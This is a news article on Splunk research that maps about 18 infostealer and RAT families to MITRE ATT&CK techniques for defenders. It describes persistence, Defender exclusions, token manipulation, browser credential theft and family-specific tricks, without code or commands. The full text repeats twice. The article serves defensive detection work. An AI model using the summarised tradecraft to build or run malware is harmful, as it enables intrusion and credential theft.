Experts have called for a change in the approach to data protection due to the classification of attacks.
It seems that each new Trojan or stealer is a unique story with its own signature. But Splunk Threat Research Team specialists took a broader look and discovered an alarming pattern. Many popular infostealers and RATs use nearly the same set of techniques, differing more in the details of their implementation than in the overall attack logic.
The Splunk team studied approximately 18 malware families, some of which were observed in real-world attacks, while others were described in detail in public reports. They then categorized them into the MITRE ATT&CK matrix to understand the most frequently repeated tactics and techniques. The result resembled a "common arsenal" for cybercriminals. The same set of steps helps them gain a foothold in a system, evade defenses, and exfiltrate data.
The most common technique was T1105, which downloads additional components after infection. Essentially, this is the ability to "finish" the next stage of the attack, such as plugins or auxiliary files. This is closely followed by T1082, which collects information about the system. The malware learns the computer name, Windows version, hardware parameters, and other details to understand where it has infiltrated and how best to proceed. The study also notes the habit of communicating with the control infrastructure via web protocols such as HTTP T1071.001. For defenders, this means something simple. Building detection around persistent techniques, rather than hashes and one-time indicators, can cover many different families at once.
This is where things get interesting, because in practice, it's not just "what they do" that matters, but also "how they do it." For example, some families use WMI to collect system information and send this data to the C2 as part of a "beacon." Another popular technique involves collecting the victim's network data. Several families obtain the external IP and geolocation by accessing legitimate IP address services. This helps operators distinguish between victims and prioritize them.
To gain a foothold in the system, they often use mundane yet effective Windows mechanisms. These include registry keys, including Run and sometimes RunOnce, as well as scheduled tasks via schtasks.exe. According to Splunk, some families further attempt to weaken protection by adding directory or file path exclusions to Windows Defender to reduce the chances of detection. A more forceful approach is also common. Some malware enables privileges like SeDebugPrivilege and manipulates tokens, gaining greater control over system processes.
A separate, major topic is stealing credentials from browsers. The study notes that many families are able to extract and decrypt saved logins and passwords from browser storage, then send them to attackers. Another recurring trick is the abuse of legitimate web services as infrastructure. Sometimes this is a C2, sometimes a storage from which downloaders pull the payload. Examples include popular services like GitLab and Dropbox.
However, no two malware families are alike. Splunk also identifies rare, more characteristic techniques that help distinguish between families. For example, one njRAT variant is capable of overwriting the MBR, effectively turning an infection into a destructive attack. DarkCrystal RAT uses an unusual execution delay via the w32tm command with the stripchart parameter; this technique is rare in legitimate environments and can be a good lead for detection. Castle RAT is distinguished by its bypass of UAC via AppInfo RPC and the launch of its payload using a trusted system process. And RedLine Stealer, according to researchers, can disable components related to Windows Update to remain in the system longer without the risk of patches closing vulnerabilities or updating security.
Splunk's main conclusion is pragmatic. A common set of techniques gives defenders the opportunity to build more universal detection rules that will survive changing malware versions and builds. Rare and specific techniques are useful in investigations when it's necessary to understand the specific family of malware being investigated and how advanced the attack is.
It seems that each new Trojan or stealer is a unique story with its own signature. But Splunk Threat Research Team specialists took a broader look and discovered an alarming pattern. Many popular infostealers and RATs use nearly the same set of techniques, differing more in the details of their implementation than in the overall attack logic.
The Splunk team studied approximately 18 malware families, some of which were observed in real-world attacks, while others were described in detail in public reports. They then categorized them into the MITRE ATT&CK matrix to understand the most frequently repeated tactics and techniques. The result resembled a "common arsenal" for cybercriminals. The same set of steps helps them gain a foothold in a system, evade defenses, and exfiltrate data.
The most common technique was T1105, which downloads additional components after infection. Essentially, this is the ability to "finish" the next stage of the attack, such as plugins or auxiliary files. This is closely followed by T1082, which collects information about the system. The malware learns the computer name, Windows version, hardware parameters, and other details to understand where it has infiltrated and how best to proceed. The study also notes the habit of communicating with the control infrastructure via web protocols such as HTTP T1071.001. For defenders, this means something simple. Building detection around persistent techniques, rather than hashes and one-time indicators, can cover many different families at once.
This is where things get interesting, because in practice, it's not just "what they do" that matters, but also "how they do it." For example, some families use WMI to collect system information and send this data to the C2 as part of a "beacon." Another popular technique involves collecting the victim's network data. Several families obtain the external IP and geolocation by accessing legitimate IP address services. This helps operators distinguish between victims and prioritize them.
To gain a foothold in the system, they often use mundane yet effective Windows mechanisms. These include registry keys, including Run and sometimes RunOnce, as well as scheduled tasks via schtasks.exe. According to Splunk, some families further attempt to weaken protection by adding directory or file path exclusions to Windows Defender to reduce the chances of detection. A more forceful approach is also common. Some malware enables privileges like SeDebugPrivilege and manipulates tokens, gaining greater control over system processes.
A separate, major topic is stealing credentials from browsers. The study notes that many families are able to extract and decrypt saved logins and passwords from browser storage, then send them to attackers. Another recurring trick is the abuse of legitimate web services as infrastructure. Sometimes this is a C2, sometimes a storage from which downloaders pull the payload. Examples include popular services like GitLab and Dropbox.
However, no two malware families are alike. Splunk also identifies rare, more characteristic techniques that help distinguish between families. For example, one njRAT variant is capable of overwriting the MBR, effectively turning an infection into a destructive attack. DarkCrystal RAT uses an unusual execution delay via the w32tm command with the stripchart parameter; this technique is rare in legitimate environments and can be a good lead for detection. Castle RAT is distinguished by its bypass of UAC via AppInfo RPC and the launch of its payload using a trusted system process. And RedLine Stealer, according to researchers, can disable components related to Windows Update to remain in the system longer without the risk of patches closing vulnerabilities or updating security.
Splunk's main conclusion is pragmatic. A common set of techniques gives defenders the opportunity to build more universal detection rules that will survive changing malware versions and builds. Rare and specific techniques are useful in investigations when it's necessary to understand the specific family of malware being investigated and how advanced the attack is.
